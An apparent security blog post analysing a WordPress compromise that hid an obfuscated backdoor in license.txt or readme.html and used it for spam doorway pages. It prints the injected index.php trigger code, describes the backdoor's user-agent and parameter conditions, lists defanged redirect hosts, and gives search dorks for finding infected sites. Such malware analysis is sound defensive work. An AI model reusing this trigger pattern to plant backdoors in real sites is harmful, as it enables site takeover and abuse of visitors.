Wigo Means Bingo for Blackseo Agent

This week my colleague Peter Gramantik showed me a few infected sites that had very similar code embedded in the WordPress index.php files:

if (eregi('-dbst',$_SERVER['REQUEST_URI'])) {
error_reporting(0);
include ('license.txt');
exit();
}

The code is very simple. It checks if a page URL has “-dbst” appended to the URL and executes code from an included file. At a first glance, it looked like a backdoor code that should be activated if hackers used special URLs with the “-dbst” passcode.

In some cases the included file was license.txt in other cases readme.html. Both files are a part of the WordPress core and are expected to be found in the root directory. However, as you might expect, they contained obfuscated code.

Wigo Conditions

After deobfuscation, sure enough, we found the backdoor code there:

Wigo backdoor
Wigo backdoor

In addition to having “-dbst” in the URL, it also required the “Blackseo Agent v 0.1” User Agent and either php4 or php5 GET parameters. In case of php4, it creates a file upload form, in case of php5, it downloads a remote file to a compromised server. In either case, the backdoor includes distinguishing “Wigo” label, which helps verify that the backdoor is there.

But as the “Blackseo Agent v 0.1” User Agent suggests, it’s not only about a backdoor. The code also had a larger part that created spammy doorways using data from hxxp://apollo5go . com/api.php?action=get_link&api_key=… and adultwww .apollo2gen .com. The doorways have a script to redirect visitors to hxxp://www .hqnuvideoz .com/out.php?id=traffic-shop.com, then to hxxp://www .us-xxx .com/tr.php?id=hqnuvideoz.com, and further to various porn sites.

Finding the Pattern

Given this information we started to Google for pages that contained “-dbst” in their URLs. dbst appeared to be quite a common abbreviation so we added some adult keywords and the [inurl:”dbst” xxx] query returned some promising results with URLs like: best-playboy-photo-ever-dbst.html. It was obvious that those were spammy doorways and the sites were compromised. We only needed to figure out if that was the same attack as we investigated. To do it, we tried to open those pages using the “Blackseo Agent v 0.1” User Agent. As expected, most of the URLs returned this:

Wigo%

Bingo!

Follow up [site:hacked-site.com inurl:”dbst”] searches revealed that this attack created from 1,000 to 40,000 spammy doorway pages on the compromised sites.

You May Also Like